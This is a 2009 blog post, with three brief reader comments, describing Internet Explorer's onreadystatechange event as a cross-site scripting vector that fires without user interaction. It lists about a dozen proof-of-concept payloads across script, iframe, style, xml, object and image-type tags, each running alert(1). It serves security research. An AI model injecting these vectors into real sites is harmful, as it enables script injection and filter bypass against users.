onreadystatechange
Wednesday, 8 April 2009
I like this event, it’s pretty cool. The reason why it’s interesting from a XSS perspective is that it is executed automatically without user interaction. This is rare in the XSS playground, usually you have to use onerror, onload or onfocus events and they only work in certain circumstances.
I’d better mention that the event is only relevant to Internet Explorer as far as I’m aware. If you know of any other browsers it works in then please leave a comment.
So which tags does it execute in? Well more than you first think. At first I could only get it to execute automatically with the iframe, script and style tags. But actually the img, image, input, isindex, iframe, script, style, xml and object tags all execute without user interaction.
Here are a list of vectors I found, notice the XML tag requires some content in order to execute, this can be accomplished without a closing tag or just some text. The object tag requires the type=image attribute. IMG, IMAGE, ISINDEX, INPUT all require a valid image loaded with the src attribute.
<script onreadystatechange=alert(1)>
<iframe onreadystatechange=alert(1)>
<style onreadystatechange=alert(1)>
<script onreadystatechange=alert(1)></script>
<iframe onreadystatechange=alert(1)></iframe>
<style onreadystatechange=alert(1)></style>
<xml onreadystatechange=alert(1)>
<xml onreadystatechange=alert(1)>test</xml>
<object type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)></object>
<img type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
<image type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
<input type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
<isindex type=image src=http://www.businessinfo.co.uk/labs/hackvertor/images/logo.gif onreadystatechange=alert(1)>
No. 1 — April 8th, 2009 at 1:44 pm
Hey,
I’ve tried this in IE6 and IE8 but can not reproduce it. Even the <script onreadystate=alert(1)> didn’t work for me.
Can you explain a bit more how you achieved it? Otherwise I would say IE is not vulnerable…
No. 2 — April 8th, 2009 at 1:48 pm
it should be onreadystatechange sorry I must have been tired
No. 3 — April 9th, 2009 at 5:20 pm
I just wrote a big reply, but it appeared to be spam…
Great.
You should fix your site.